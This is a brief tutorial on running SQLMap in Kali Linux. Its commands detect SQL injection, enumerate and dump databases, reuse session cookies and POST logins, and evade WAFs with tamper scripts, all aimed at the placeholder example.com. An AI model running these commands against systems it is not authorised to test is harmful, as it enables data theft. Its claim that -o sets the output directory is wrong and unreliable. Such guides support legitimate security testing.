SQLMap is an open-source penetration testing tool that automates the process of detecting and exploiting SQL injection vulnerabilities. It can be used to test web applications for SQL injection vulnerabilities and extract data from databases. Here’s a step-by-step guide on how to use SQLMap in Kali Linux.
Open a Terminal in Kali Linux.
Basic Command Structure:
- Use
sqlmap -u <URL> [options]where-uspecifies the target URL.
Examples:
- Detect SQL Injection: To check if a URL is vulnerable, use:
sqlmap -u "http://example.com/page?id=1" - Enumerate Databases: If a vulnerability is detected, list databases with:
sqlmap -u "http://example.com/page?id=1" --dbs - Enumerate Tables: List tables in a specific database:
sqlmap -u "http://example.com/page?id=1" -D database_name --tables - Dump Data from a Table: Extract data from a table:
sqlmap -u "http://example.com/page?id=1" -D database_name -T table_name --dump
Advanced Options:
- Specifying a Cookie: For authenticated testing, provide a session cookie with:
sqlmap -u "http://example.com/page?id=1" --cookie="PHPSESSID=abc123" - Specifying User-Agent: Customize the User-Agent string:
sqlmap -u "http://example.com/page?id=1" --user-agent="Mozilla/5.0" - Using a POST Request: If parameters are sent via POST:
sqlmap -u "http://example.com/login.php" --data="username=admin&password=password" - Evading WAFs/IDSs: Use tamper scripts to modify payloads, for example:
sqlmap -u "http://example.com/page?id=1" --tamper=space2comment
Logging and Output: SQLMap saves logs and outputs in the .sqlmap/output/ directory. You can specify a different directory using the -o option.